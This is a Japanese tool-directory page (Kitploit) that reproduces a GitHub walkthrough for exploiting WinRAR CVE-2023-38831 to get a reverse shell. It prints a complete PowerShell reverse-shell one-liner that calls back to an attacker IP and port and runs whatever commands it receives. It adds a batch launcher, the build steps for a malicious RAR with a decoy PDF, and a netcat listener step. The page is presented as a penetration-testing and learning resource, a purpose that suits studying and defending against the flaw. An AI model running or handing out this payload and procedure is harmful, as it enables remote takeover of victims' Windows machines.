Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-38831_ReverseShell_Winrar-RCE — Winrarの脆弱性CVE-2023-38831を悪用してリバースシェルを取得するための必要な手順(6.23より前のバージョン) | Kitploit
ツール/GitHubGitHub/maalfer/cve-2023-38831_reverseshell_winrar-rce
エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発ラボと実践
GitHubmaalfer/cve-2023-38831_reverseshell_winrar-rce

CVE-2023-38831_ReverseShell_Winrar-RCE

Winrarの脆弱性CVE-2023-38831を悪用してリバースシェルを取得するための必要な手順(6.23より前のバージョン)

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
リポジトリを見る
22843年前Kitploit レビュー済み
共有

WINRARの脆弱性CVE-2023-38831を悪用したリバースシェルの取得

このリポジトリでは、WinRARの脆弱性CVE-2023-38831を悪用して、被害者のWindowsマシンから攻撃者のKali Linuxマシンへリバースシェルを取得する方法を紹介します。

事前準備

このリポジトリのコンテンツをダウンロードします:

imagen

次に、この脆弱性を悪用するために必要なPythonの依存関係を以下のコマンドでインストールします:

root@kitploit:~
pip install rarce

imagen

準備

リバースシェルを提供する悪意のあるコードを実行します。これはrevshells.comのウェブサイトから取得します(攻撃者のIPアドレスとポートを指定):

https://www.revshells.com/

imagen

root@kitploit:~
$LHOST = "192.168.0.36"; $LPORT = 443; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

このPowerShellコードを.ps1ファイルに保存します(後で実行されます):

imagen

リバースシェルを取得するためのps1コードを入手したら、osライブラリを使用して.ps1ファイルを実行するPythonファイルを作成します:

imagen

次に、以下のコードを含む.batファイルを作成します:

imagen

root@kitploit:~

rem Ruta al ejecutable de Python
set PYTHON_EXECUTABLE=python.exe

rem Ruta al script de Python que deseas ejecutar
set PYTHON_SCRIPT=pwned.py

rem Ejecutar el script de Python
%PYTHON_EXECUTABLE% %PYTHON_SCRIPT%

rem Pausa para que puedas ver la salida antes de que se cierre la ventana
pause

悪用

この時点で、悪意のあるWinRARファイルを作成する必要があります:

imagen

.rar内のdocumento.pdfファイルを実行します:

imagen

imagen

最後に、攻撃マシンからnetcatで待受状態にしておくと、リバースシェルを受信できます:

imagen

考えられるエラーの解決策:

PowerShellコマンドを実行できない場合は、システムでスクリプトの実行を有効にする必要があります:

imagen

imagen

有効にします:

imagen

そして、以下のコマンドを実行します:

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

ツールをダウンロード